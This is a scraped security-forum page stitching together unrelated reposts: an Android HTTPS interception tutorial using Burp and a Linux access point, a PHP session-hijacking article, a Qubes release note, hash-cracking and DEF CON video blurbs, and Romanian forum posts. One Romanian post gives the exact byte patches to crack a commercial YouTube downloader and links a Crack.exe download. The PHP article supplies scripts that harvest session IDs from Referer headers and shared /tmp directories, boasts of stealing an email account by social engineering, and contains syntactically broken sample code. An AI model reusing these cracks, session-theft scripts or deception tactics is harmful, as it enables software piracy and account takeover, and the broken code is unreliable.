non-signed certificate immediately. Therefore, we can conclude that intercepting the HTTPS traffic for most applications will be a little more difficult that just using a proxy. Option 2: Adding the Burp’s CA Certificate In the previous section we said that HTTPS intercepting is possible in some applications, but we can’t intercept the traffic successfully, because Burp presents a non-signed certificate to the application. Since the default behavior doesn’t allow the application to use non-signed certificate, those errors will cause the application to fail and the requests will not be sent over the encrypted HTTPS tunnel. Here we’re going to extract the CA self-signed certificate that Burp uses from Burp and add it to the Android’s certificate store. This way, we’ll force the Android system to trust that certificate and connect to Burp without alerting the user about certificate not being trusted. The CA certificate is regenerated every time we restart Burp. Every time we make an encrypted connection to some host on the internet, Burp then generates another server certificate and signs it with the previously created CA certificate. Thus, if we add the CA certificate to the certificate store on the Android device, the connection to Burp will be trusted and we will also be able to intercept HTTPS traffic between android device and target web application. First we have to export the CA certificate from Burp. We can do that by first setting up the proxy in Firefox or some other browser and then visiting an HTTPS-enabled web site. At that point, the web browser will present a warning notifying us that the certificate is not trusted. We need to add exception for that certificate and export it at the same time. To export the certificate, we must view the details of the certificate, which can be seen in the picture below: We can see that we selected the PortSwigger CA certificate and exported it. If we save the certificate into the file PortSwiggerCA and output its contents, we will get something like this: # cat PortSwiggerCA -----BEGIN CERTIFICATE----- MIICxDCCAi2gAwIBAgIEUI2pETANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhML UG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0 U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2ln Z2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xMjEwMjgyMTUyMTda Fw0zMjEwMjMyMTUyMTdaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UE CBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQ b3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBv cnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCoXLjIpRJh Sh/DbmhUCJErTgANPnoBBhfj97P6Gaya3BP+7NfzT670INyK2o5iS3FtSI78OZJ1 Sjgmg1jpycSqAPuOWS76kqrLiu+FaMAIAzYfIbei68wnPEAIflIA5AQpbSd5A4eF ldOhRYTz5VfTJxvy388KFkqHi6JD+lnSSQIDAQABozUwMzASBgNVHRMBAf8ECDAG AQH/AgEAMB0GA1UdDgQWBBTDazkycGJQkgV6GdPacarqRrMISDANBgkqhkiG9w0B AQUFAAOBgQCiLCy7AQHpWLq1W2DANmrybMmSUFXqcOMZei/xb/61LS4NjoVIQ4Fm 1OWLSJX/t00P+fS0Xk/5+vnWgIE+WP8Z9l6eWzNu/7EU6GCm1vECZ2X+XycD8wgB hZv17D+I0mFcHJFQtgq2sranJ+7oITkXOhcpwJ2+6+aTPDoUkp2AlQ== -----END CERTIFICATE----- This is the CA certificate that we need to import into the Android certificate store. To do that, we need to connect the phone to our system and copy the certificate to SDCARD on the Android phone. We can do that with the command below: # adb push PortSwiggerCA /sdcard/ 22 KB/s (1038 bytes in 0.045s) The CA certificate will then be stored in the SDCARD on the Android phone. To add it to the certificate store, we need to go to Preferences–Security and select “Install from device storage”. When clicking on that entry, it will say that there is no valid certificate present on the SDCARD. But how is that possible? We just pushed the certificate from our computer to the SDCARD. The problem is that this process looks only for the file extensions to find the certificates and we pushed the default certificate to the SDCARD without the file extension. To bypass that limitation, we need to save the certificate as PortSwiggerCA.crt, push it to the Android SD card again and rescan the storage device. Now the CA certificate is found and we can simply import it into the certificate store by clicking on OK button. The process will then open a Toast message saying that the PortSwiggerCA certificate was successfully installed. After that, we can start a web browser and try to visit an HTTPS-enabled web site. Upon opening the HTTPS URL, the Android will be able to verify the trust of the certificate presented by Burp and the web site will open normally. Additionally we will be able to see all the HTTPS traffic flowing through the internet in a Burp proxy. Since Burp creates a new CA certificate every time we restart it, it’s way better to create a new CA certificate manually, load it into Burp and also onto the Android device; then we will always be able to intercept HTTPS traffic as long as Burp will use the created CA certificate. We can follow the instructions presented here [1] to create the CA certificate manually. Basically, we need to execute the following commands to create the CA certificate: # openssl genrsa -des3 -out ca.key 4096 # openssl req -new -x509 -days 1000 -key ca.key -out ca.crt This will create the CA certificate named ca.crt, which we need to import into our Android device. We can push it into the SDCARD as we did before and add it to the certificate store. By doing that we will be able to sign any server certificate with our CA certificate and the Android device will always trust the server certificate, because it trusts the CA certificate. Next, we also need to create the server certificate signed by the previously created CA certificate, which we’ll be using in Burp. To do that we must execute the commands below, again taken from [1]: # openssl genrsa -des3 -out server.key 4096 # openssl req -new -key server.key -out server.csr # openssl x509 -req -days 1000 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt # openssl pkcs12 -export -out server.p12 -in server.crt -inkey server.key The certificate will be stored in a file named server.p12, which is the server certificate we need to configure Burp with (signed by the previously created CA certificate). To configure Burp to use that certificate, we must open Proxy–Options and configure the “server SSL certificate” options as shown in the picture below: Of course, we must also provide the password for the server certificate. The important thing we need to remember is the Common Name (CN) that we used when creating the server certificate. It is only that domain that we’ll be able to sniff without the warning message that the certificate is not valid. So why did we go through the hassle of creating our own certificates if we still need to recreate the server certificate and import it into Burp for each domain in the testing scope? The answer is quite simple: because we don’t need to recreate the CA certificate every time. We created the CA certificate, imported it into the certificate store on an Android phone and now our system trusts every server certificate, which is signed by that CA certificate. This is why we don’t ever need to transfer another CA certificate to the phone and install it; all we need to do is create another server certificate with appropriate CN on our computer and configure Burp to use it. All we need to do from now on is to create a new server certificate for the domain we would like to test, sign it with the CA certificate, and import it into Burp. We don’t need to configure anything else on the Android. If we’re going to extensively sniff HTTP/HTTPS traffic from the Android device, it’s better to set up AndroidProxy, which is a program that sits between the Android device and our Burp proxy and makes it easy to intercept HTTPS traffic by sending the domain name instead of the IP address to our proxy. It does this by intercepting all DNS requests and rewriting the CONNECT command, passing the domain name to it, rather than IP address. This should be done before the requests reach the Burp proxy, which uses the CONNECT directive to associate the correct IP address with the DNS hostname. A picture taken from the homepage of the AndroidProxy project on the Google Code, which explains this a little further, is presented below: Option 2: Using a Linux Access Point We’ll be setting up the access point via the hostapd wireless host AP daemon. First we need to install it via our default package manager on the Linux system. The hostapd daemon adds a configuration file /etc/hostapd/hostapd.conf, which contains the default configuration variables shown below: # cat /etc/hostapd/hostapd.conf | grep -v ^# | grep -v ^$ interface=wlan0 logger_syslog=-1 logger_syslog_level=2 logger_stdout=-1 logger_stdout_level=2 dump_file=/tmp/hostapd.dump ctrl_interface=/var/run/hostapd ctrl_interface_group=0 ssid=test hw_mode=g channel=1 beacon_int=100 dtim_period=2 max_num_sta=255 rts_threshold=2347 fragm_threshold=2346 macaddr_acl=0 auth_algs=3 ignore_broadcast_ssid=0 wmm_enabled=1 wmm_ac_bk_cwmin=4 wmm_ac_bk_cwmax=10 wmm_ac_bk_aifs=7 wmm_ac_bk_txop_limit=0 wmm_ac_bk_acm=0 wmm_ac_be_aifs=3 wmm_ac_be_cwmin=4 wmm_ac_be_cwmax=10 wmm_ac_be_txop_limit=0 wmm_ac_be_acm=0 wmm_ac_vi_aifs=2 wmm_ac_vi_cwmin=3 wmm_ac_vi_cwmax=4 wmm_ac_vi_txop_limit=94 wmm_ac_vi_acm=0 wmm_ac_vo_aifs=2 wmm_ac_vo_cwmin=2 wmm_ac_vo_cwmax=3 wmm_ac_vo_txop_limit=47 wmm_ac_vo_acm=0 eapol_key_index_workaround=0 eap_server=0 own_ip_addr=127.0.0.1 We can see that we’re used the wlan0 interface on the channel number 1 and the SSID access point name is test. Start the hostapd: # /etc/init.d/hostapd start * Caching service dependencies ... * Service `hostapd' needs non existent service `net.wlan0' * ERROR: hostapd needs service(s) net.wlan0 To bypass this error we need to symling the net.lo to the net.wlan, because the above error message said that the net.wlan0 doesn’t exists. This way we can simply bypass the above check. To create the symbol, execute this command: # ln -s /etc/init.d/net.lo /etc/init.d/net.wlan0 Afterwards we need to start the net.wlan0, which we can do with the following command: # /etc/init.d/net.wlan0 start * Bringing up interface wlan0 * Starting wpa_supplicant on wlan0 ... * Starting wpa_cli on wlan0 ... * Backgrounding ... ... * WARNING: net.wlan0 has started, but is inactive Okay, the wlan0 interface card is inactive., Hmmmm … why? It’s because we haven’t edited the /etc/conf.d/net yet and added the appropriate settings for the wlan0 interface card. We need to add something as follows to the /etc/conf.d/net configuration file: modules_wlan0=( "!iwconfig !wpa_supplicant" ) config_wlan0=( "10.1.2.1 netmask 255.255.255.0" ) Then we can restart the wlan0 init script, which can be done with the command below: # /etc/init.d/net.wlan0 restart * Caching service dependencies ... * Bringing down interface wlan0 * Removing addresses * Stopping wpa_cli on wlan0 ... * Stopping wpa_supplicant on wlan0 ... * Bringing up interface wlan0 * You are using a bash array for config_wlan0. * This feature will be removed in the future. * Please see net.example for the correct format for config_wlan0. * 10.1.2.1 ... SIOCSIFFLAGS: Operation not possible due to RF-kill * ERROR: net.wlan0 failed to start What’s happening? There was some error informing us that operation is not possible because of the RF-kill. If we install the rfkill program we can inspect the settings of wireless devices. First let’s list all available wireless devices: # rfkill list all 0: hci0: Bluetooth Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: yes Hard blocked: no The wireless card is soft blocked? This is probably the reason we’re getting the above error. To unblock the wireless card we can execute this command: # rfkill unblock all # rfkill list all 0: hci0: Bluetooth Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: no Hard blocked: no With the first command we unblocked all the wireless devices, but because only the wireless card was blocked, only the wifi was actually unblocked. Then we presented the wireless devices again; we can see that the wireless card isn’t blocked anymore, which is good. We can try restarting the wlan0 init script again. This time there are no errors and the net.wlan0 init script works fine, which can be seen below: # /etc/init.d/net.wlan0 restart * Bringing up interface wlan0 * You are using a bash array for config_wlan0. * This feature will be removed in the future. * Please see net.example for the correct format for config_wlan0. * 10.1.2.1 ... The wlan0 interface card now has the 10.1.2.1 IP set accordingly to the /etc/conf.d/net configuration file. We can display the information about the wlan0 interface card with the following command: # ifconfig wlan0 wlan0 Link encap:Ethernet HWaddr 00:26:c6:21:cf:1a inet addr:10.1.2.1 Bcast:10.1.2.255 Mask:255.255.255.0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:47740 errors:0 dropped:0 overruns:0 frame:0 TX packets:48220 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:36288822 (34.6 MiB) TX bytes:12441625 (11.8 MiB) The inet addr says that the IP address is 10.1.2.1, which is correct, and the Mask is 255.255.255.0, which is also correct. The route in the routing table has also been correctly added: # route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.1.2.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0 We need to set up the DHCP server. We can do that by using the dnsmasq, which provides DHCP and DNS services. First we need to install and configure the dnsmasq. We won’t go into the installation part of the dnsmasq, as you can probably just install it with your default package manager. Then we need to start the DHCP server, which we can do simply by executing this command: # /etc/init.d/dhcpcd start * Caching service dependencies ... * Starting DHCP Client Daemon ... After that we can simply start hostapd, which will provide us with the access point we can connect to. When the mobile phone is connected to our AP, we simply need to forward the packets out to the internet and optionally intercept them. Probably the whole point of doing this is intercepting the data, which is why we probably will be intercepting the data. We won’t describe that here, because it’s out of the scope of the article, since we only wanted to show how to connect the phone in ways that we’re able to use for intercepting the traffic. Conclusion We showed various ways we can use to intercept the traffic from an Android phone on the computer, which allows us to inspect and modify the traffic. The easiest part is to sniff for the HTTP and HTTPS traffic, but most of the applications will use that, so we’re pretty much covered. The first thing to do when trying to intercept the traffic is to set the proxy in the application itself, if it supports one. Most of the time, the applications don’t support proxying, which is why we’ll need to set a global proxy on an Android phone. But some applications bypass the proxy, so we need different methods to still be able to intercept the traffic. One of them we briefly described (but didn’t provide too much detail) is to connect our phone to an arbitrary access point that we set up on our computer. That way all the traffic will be flowing through our AP upon connecting to it. Remember that those are just a few ways to intercept the traffic, but there are many other techniques as well. One of them is to set up a sniffer on the actual router and then connect the phone to our home router, which is quite elegant and easy solution. There is no unique recipe how to intercept the data from the Android applications, but it can be done as we showed above. References: [1] Self-signed Certificates in Burp, accessible on un-excogitate.org

PHP Session ID’s – The Risks Adrian Stolarski December 31, 2012 In today’s article I want to address a very important topic. Namely, I want to talk about PHP session security. I know and understand that this is a very broad topic, but is also extremely interesting. PHP, even though it is simple and intuitive, is considered bad language if you want to write any halfway complex software. Why is that? The fault lies not with the language itself, but the programmers and administrators who do not understand it. This article will show you how to attack a session mechanism. Use browsers weakness PHP generally has two options for the transmission of session IDs. Both of them are very interesting from our point of view. The first is to transfer the session identifier in the address, so the session ID is then available to the public. The second way is a much safer route, and it is to use cookies. Although it may be safer to use a cookie, it does not give you 100% security. Well, what happens when you’re on my side, and I’ll start to collect all the information of your cookies? All cookies, which are generated by visiting your favorite web sites, such as logging into the post office or a paid service? For me, the first solution is interesting and shows the lack of creativity of developers and administrators of the servers on which PHP is installed. The understanding of the written code can be very difficult though. The first method is to simply transfer session using the GET array. Here is an example: Example Domain b537a69ac366e85208de Beautiful, is it not? Do you know why it is still used? Many developers and administrators are afraid that users will block their browsers ability to receive cookies. It is responsible for the session.use_trans_sid option in php.ini. You know what risks it brings? With redirection, most browsers use this header: Referrer: Google Of course this is just an example. The contents of the header may be different, but it’s actually irrelevant. In the header, all the information about the previously visited site is transmitted. This header is sent only when we move to another page by clicking a link, rather than typing the address in your browser. Do you have a page where pop up ads always display in your browser? It annoys me like heck. I cannot look at them. What do I do? Buy a crafted link to my website on your website. Of course, I do side with a high click-through rate. My beautiful site will also contain a one very malicious script. Here’s the code: <?php if(isset($_SERVER['HTTP_REFERER'])){ $file=fopen("devilishchuckle.txt", "a"); fputs($file, $_SERVER['HTTP_REFERER']."\r\n"); fclose($file); } ?> The operation of a hacker script is as follows. $ _SERVER Is a superglobal command. First, we look at whether it initiated HTTP_REFERER as part of the $ _SERVER, then open the specified file, save and close the file. Beautiful and how easy to use. This can be compared to the iPhone and rotten apples. Everyone clicks on the link, it automatically will give your session id to the hacker, and the hacker will be able to log in as that person and destroy the credibility of the portal. Social engineering This is something that neither that is not immune to neither methods. Social engineering is described in the following articles: InfoSec Institute Resources – Social Engineering – We Start Playing InfoSec Institute Resources – Social Engineering 2—What Do We Have To Watch? How does this relate to PHP? Describe two stories, both show the extent of human stupidity and never be disappointed. Both have happened. Here they are: The first corresponds exactly to that of the writing. Once I managed to persuade someone to do something for me, nothing major, such as logging on to your e-mail account, and then send me the URL and your browser cookies. Then I showed that person what you can do with the data, which is willingly given. It was ridiculously easy. The other one is even more humorous. Once I entered the chat and pretended to be a lady, I got into a conversation with a desperado. He wanted a photo. I ordered him to give me an e-mail address. The guy did it without any resistance. I then waited for him to send me a photo. Then I asked why it had not come. I figured that mine crashes, it’s a mistake, and that he must give me the password to his e-mail address, and I will write to him from there. The first thing I did was to hurry and change his password to the e-mail. Sometimes it is exciting that we give their personal details to other strangers. However, I always try to verify the identity of people and do not give away precious private information to strangers. This is the principle, which is always observed. The possibility of session hijacking, having access to the server There is another thing that we must remember. If we have our website on a public server, where we are never alone, in addition to the normal users, public servers are filled with bad, lazy hackers. If the administrators are lazy, it can have serious consequences. Lazy administrators always leave something like a default PHP configuration set. That is the path to save the session. By default, PHP is /tmp, the location of which is really somewhere all users can read. It is enough that this lists the directory, but you can also view the session IDs. If we host the website in a large server, if known, will surely have a lot of sites hosted on it. This way, we can get a really large number of session IDs. Now, how to find the ones that interest us? Believe me, you do not have to use the same session ID. In a very simple way you can pull data from each session. define("SESSION_DIR", "/tmp/session/"); // session dir define("START", 5); // need to substr, the number of sessions depends on the name define("END", 32); // need to substr, the number of session depends on the name if(!isset($_GET['id'])){ $directory = opendir(SESSION_DIR); while($files=readdir($directory)){ $files = substr($files, START, END); echo "<a href=\"session.php?id=".$files."\">".$files."</a><br>"; } } else { session_id($_GET['id']); session_start(); foreach($_SESSION as $variable => $value){ echo $variable."=".$value."<br>"; } $directory = opendir(SESSION_DIR); while($files = readdir($dir)){ $files = substr($files, START, END); echo "<a href=\"session.php?id=".$files."\">".$files."</a><br>"; } } ?> As you can see our hacker script is very simple, yet very useful. It displays all session IDs. When you click on the ID, it shows us the data from the session id. Of course, that can also be defended. What is the fastest way to do so? Well, we can always change the path of data recording session, to a path that will be less available. However, just taking this step does not offset the risk as it exists as long as the user can list the directory. The next thing you should do is put each account in the Apache chroot or jail. This solution is also not the best as the amount of space that should be used varies. It is of course better idea to put set safe_mode to ON in php.ini. This way, no one will be able to be able to list the directory with the PHP sessions. Of course, we still have a problem with people who have shell accounts. Just remember that if I set the chmod, they also will not do too much. So how do we create a secure session id? In this article I strongly criticized mechanisms available in PHP sessions. This is still not the ultimate solution as to run completely secure. At the end of this article I want to show an alternative way to generate session IDs in PHP. Perhaps it is not as powerful as the one that already is in PHP, but it sure is safer and much easier to use. The main difference in the class below will rely on the fact that the problem has been completely easy to gather the session ID. You can read more about passwords in the following article: InfoSec Institute Resources – Best Practices When Creating Passwords As a hash of the password, the data used browser and IP address data. As a result, the session ID is created, which completely avoids what is called the birthday problem. That is when the browser gives so much data that it is impracticable to two people handling the same password. The class is really very simple, and to generate the session ID hash function we use md5() because there is no point if you are using something else such as Mcrypt. Below is the full code of a simple class to generate session IDs: <?php define("BUFFER_SIZE", 1024); define("SESSION_PATH", "user_sessions/"); define("SEPARATOR", "="); define("END_LINE", "\r\n"); class SessionIDGenerator { public function __construct(){ } public function sessionStart(&$session_array){ if(file_exists(SESSION_PATH.userHash())){ $file = fopen(SESSION_PATH.userHash(), "r"); flock($file, LOCK_SH); while($line = fgets($file, BUFFER_SIZE)){ list($variable, $value) = explode(SEPARATOR, $line); $session_array[trim($variable)] = trim($value); } flock($file, LOCK_UN); fclode($file); } else { $file = fopen(SESSION_PATH.userHash(), "w"); fclose($file); } } public function sessionClose(&$session_array){ if(file_exists(SESSION_PATH.userHash()) || isset($session_array)){ file = fopen(SESSION_PATH.userHash(), "w"); foreach($session_array as $variable => $value){ flock($file, LOCK_EX); fputs($file, $variable.SEPARATOR.$value.END_LINE); flock($file, LOCK_UN); } fclose($file); unset($session_array); return true; } else { return false; } } public function sessionDestroy()(&$session_array){ unlink(SESSION_PATH.userHash(); unset($session_array); return; } private function userHash(){ return md5($_SERVER['REMOTE_ADDR'].$_SERVER['user_agent']); } } ?> Now we have a mechanism to generate session IDs. How can I put it to use? It is also very simple. See for yourself: <?php $sessionIdGenerator = new SessionIdDenerator; $sessionIdGenerator->sessionStart(&$SessionArray); $SessionArray['login'] = "user"' $SessionArray['password'] = "password"; $sessionIdGenerator->sessionClose(); ?> At the moment, it makes no sense to write your own session management mechanism. Mechanisms built into PHP can quietly handle it. We just took a little bit better protection mechanisms in PHP sessions than standard. Summary The fact that even I took the PHP language testifies to its extraordinary popularity. In a previous article on PHP: InfoSec Institute Resources – Nine Wishes for Your PHP Applications I mentioned this to my requests for application developers. Today I raised another very important issue: the dangers associated with the session IDs. This is very important because a lot of hackers could create a mess. Although this is not the focus of this article, you should know that each session shown has expired. If it starts to use the information contained in this article, you have to be very hurried. There is, however, such a thing as a long-term session. So if we do not protect the programmer through good session ID generation, we probably won’t against long-term sessions. One day I’ll show you how we should write a much better session mechanism than the one built in to PHP. That is not the focus of today’s article. You should seriously consider the combinations if you are using the mechanism of the session. You can share user data stored in the database as part of the cookie, but the other part stored in the session. Mechanisms for handling session data are the most important for anyone who writes PHP applications. Therefore it is really worth it to devote a lot more time than some other PHP elements. I greet you and wish you many safe and successful PHP projects in the future. Sursa: InfoSec Institute Resources – PHP Session ID’s – The Risks

[h=1]Qubes 2 Beta 1![/h]by Mayuresh on December 31, 2012 Our first post regarding the Qubes OS can be found here. A few days ago Qubes 2 Beta 1 was released! This is the first Beta for Qubes Release 2 and introduces generic support for fully virtualized AppVMs (called HVMs in common Xen speak), and specifically initial support for Windows-based AppVMs integration. “Qubes implements Security by Isolation approach. To do this, Qubes utilizes virtualization technology, to be able to isolate various programs from each other, and even sandbox many system-level components, like networking or storage subsystem, so that their compromise don’t affect the integrity of the rest of the system. Qubes lets the user define many security domains implemented as lightweight Virtual Machines (VMs), or “AppVMs”. E.g. user can have “personal”, “work”, “shopping”, “bank”, and “random” AppVMs and can use the applications from within those VMs just like if they were executing on the local machine, but at the same time they are well isolated from each other. Qubes supports secure copy-and-paste and file sharing between the AppVMs, of course.” [h=2]Changes made to Qubes:[/h] Support for generic fully virtualized VMs (without qemu in the TCB!) Support for Windows-based AppVMs integration (clipboard, file exchange, qrexec, pv drivers) Secure audio input to select AppVMs (Hello Skype users!) Clipboard is now also controlled by central policies, unified with other qrexec policies. Out of the box TorVM support Experimental support for PVUSB Updated Xorg packages in Dom0 to support new GPUs DisposableVM customization support … and, as usual, various fixes and other improvements Something new this time – unlike the rest of Qubes, which is distributed under a GPL v2 license, the Qubes Windows Support Tools are not open sourced and are distributed as binaries only, under a proprietary license. They are free to use for any Qubes 2 user. The tools are not part of the Qubes 2 installation ISO (which is GPL), and are down loadable on demand. Download Qubes: Qubes 2 Beta 1 – Qubes-R2-Beta1-x86_64-DVD.iso Sursa: Qubes 2 Beta 1! — PenTestIT

Skype Hash Dumper 1.0 Authored by Kevin Devine This is a tool that demonstrates dumping MD5 password hashes from the configuration file in Skype. Download: http://packetstormsecurity.com/files/download/119155/skype_dump.zip Sursa: Skype Hash Dumper 1.0 ? Packet Storm

Inca exista persoane cu acea mentalitate "old school" care fac totul din placere si NU pentru bani. Cat timp vor exista astfel de persoane, "scena" va exista. Nu ne trebuie banii vostri, prefer sa iti dau VIP daca dai acei bani pentru o carte si imi demonstrezi ca ai citit-o si ca ai invatat ceva din ea, pentru ca apoi si altii sa invete de la tine. E trist sa vad cat de usor banii pot distruge pasiunea...

5

Da, acum l-am vazut si eu, imi place Iei, imi descarca automat to playlistu

Autor: Nytro © Romanian Security Team 2012 De obicei ascult muzica pe Youtube dar azi mi s-a pus pata sa imi descarc melodiile pe care le aveam in playlist. Si incerc eu niste site-uri, vad ca merg naspa, apoi caut si descarc un program pe care il gasesc aici: YouTube MP3 Downloader - Descarca - RO - Download.CHIP.eu . Pare ok, aranjat, cand colo, ma trezesc ca imi descarca/converteste doar jumatate de melodie. Cum tot nu aveam ce face, am zis sa incerc sa ii fac un crack. Primul pas si cel care mi-a luat cel mai mult timp a fost sa gasesc unde se face verificarea serialului. Se putea face simplu cautand mesajul de eroare: 007D8B51 . C785 3CFFFFFF >MOV DWORD PTR SS:[EBP-C4],Download.00638>; UNICODE "Invaild Regstration Code." Am gasit pana la urma unde se face verificarea serialului dupa ceva chin: Pur si simplu in locul unui jnz care nu se executa pun un jmp. Nu era practic verificarea serialului, ci doar o verificare anterioara. .text:007D8AF7 test eax, eax Insa apoi se face verificarea si la fel, se face un salt catre portiunea de cod care ne arata ca serialul este incorect. O simpla transformare din jnz in jz e de ajuns. Procedura .text:007D9323 loc_7D9323: Fiind apelata de .text:007D8FAB jnz loc_7D9323 Am avut ceva probleme cu mai multe exceptii insa am trecut peste. Nu va recomand IDA deoarece nu poate "patch-ui" direct executabilul. In primul rand trebuie modificat ceva in config pentru a avea disponibil meniul de "Patch", apoi se creaza un "diff" cu ajutorul caruia se patch-uieste programul. Mai multe detalii aici: Marco Ramilli's Blog: How to Patch Binary with IDA Pro Patch-ul este banal: This difference file is created by The Interactive Disassembler Downloader.exe 003D8AF9: 0F E9 003D8AFA: 84 66 003D8AFB: 65 01 003D8AFC: 01 00 003D8FAC: 85 84 Iar in teste, programul crack-uit pare sa accepte orice serial: Am reinstalat programul, facea aceleasi figuri, am pus crack-ul in locul lui si pare sa functioneze, sa accepte orice serial: Bine, nu stia daca il putem denumi "crack" dar cam asta e. Si in sfarsit imi descarca si mie toata melodia: "CIA - Suntem tot aici.mp3" Download crack: https://rstforums.com/proiecte/Crack.exe Mirrors: http://www.speedyshare.com/2M4sa/Crack.exe http://www18.zippyshare.com/v/38589448/file.html PS: Puteti compara cu originalul, folositi "Compare It" sau orice altceva pentru a verifica diferentele, sunt doar vreo 5 bytes diferiti. Setup: http://download.chip.eu/ro/YouTube-MP3-Downloader_6745448.html Thanks, // Nytro

Nu am baut nimic, dar sa fiu al dracu de am inteles ceva din tot carnatu asta. Nu am intrat in topicu cu "Unde faci Revelionul", dar intru acum, pentru ca sunt sigur ca e mai interesant. Nu va tine nimeni cu forta aici. Faptul ca sunteti aici e un privilegiu, nu un drept si in niciun caz o obligatie. Sunt sarbatorile, stau pe RST mai mult decat ar trebui, ar trebui sa imi bag pula in voi, ca nu meritati nimic, nu sa stau pe aici.

Da, hash-urile sunt citite din /etc/shadow, deci ai nevoie de root pentru a le putea citi...

Crack Linux Hashes Using Metasploit Framework Description: In this video I will show you how to crack Linux hashes using the Metasploit framework auxiliary module and make sure that your Database is connected with Metasploit – Framework or you will get errors. I’m using John the Ripper Auxiliary modules this module will allow you to crack your hashes and you can read your password in plain text but you have to use the dictionary for the brute-force attack. This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower. John the Ripper Linux Password Cracker | Metasploit Exploit Database (DB) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Crack Linux Hashes Using Metasploit Framework

Sploitego - Maltego's (Local) Partner In Crime Description: PDF : - https://media.defcon.org/dc-20/presentations/Douba/DEFCON-20-Douba-Sploitego.pdf Extra : - https://media.defcon.org/dc-20/presentations/Douba/Extras.zip Have you ever wished for the power of Maltego when performing internal assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully crafted several local transforms that gives Maltego the ooomph to operate nicely within internal networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting? This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome Python framework that makes writing local transforms as easy as 'Hello World'. Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack, reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public repositories. Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos and scenarios as well as fun and laughter. Nadeem Douba - GWAPT, GPEN: Currently situated in the Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security (a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services to various clients in the health, education, and public sectors. Nadeem has been involved within the security community for over 10 years and has frequently presented at ISSA and company sponsored seminars and training sessions. He is also an active member of the open source software community and has contributed to projects such as libnet, Backtrack, and Maltego. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Sploitego - Maltego's (Local) Partner In Crime

Hacking The Google Tv Description: PDF : - https://media.defcon.org/dc-20/presentations/Xenofex/DEFCON-20-Xenofex-Panel-Hacking-the-GoogleTV.pdf The GoogleTV platform is designed to bring an integrated web experience, utilizing the Chrome web browser and Android applications, to your television. GoogleTV is based on the Android operating system, which is mainly used in tablets and smart phones, but customized with security features not normally seen on most Android devices. The current version of the platform utilizes signatures to establish a “chain of trust” from bootloader to system applications. This presentation will focus on the current GoogleTV devices, including X86 platform details, and the exhaustive security measures used by each device. The presentation will also include video demonstrations of previously found bugs and exploits for each GoogleTV device and includes specific details about how each bug works. Furthermore, we will include interesting experiences that the team has encountered along the way. Finally the talk will be capped off with the release of multiple unpublished GoogleTV exploits which will allow unsigned kernels across all x86 devices (Revue / Sony GoogleTV). Amir "Zenofex" Etemadieh founded the GTVHacker group and has been working on the GTVHacker project from its initial start in November 2010. Amir has done independent security research in consumer electronics including the Logitech Revue, Ooma Telo, Samsung Galaxy S2, Boxee Box and services such as the 4G Clear Network finding both hardware and software flaws. Twitter: @zenofex GTV Hacker GTVHacker CJ Heres is an IT consultant during the day, tinkerer at night. He enjoys examining and repairing all sorts of devices from cars to blu-ray players. His philosophy is to use a simple approach for complex problems. CJ’s recent work includes Sony GoogleTV, Boxee Box, and Vizio Smart TV’s. Twitter: @cj_000_ Dan Rosenberg Dan Rosenberg is a vulnerability researcher who takes sick pleasure in exploiting anything with a CPU. He once punched an Android in the face. Twitter: @djrbliss Tom "tdweng" Dwenger is a software engineer who has been developing and reversing Android for the last 2 years. Tom is known for being able to quickly reverse Android applications and has been an active member of the GTVHacker team since its initial start in 2010. Twitter: @tdweng Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hacking The Google Tv

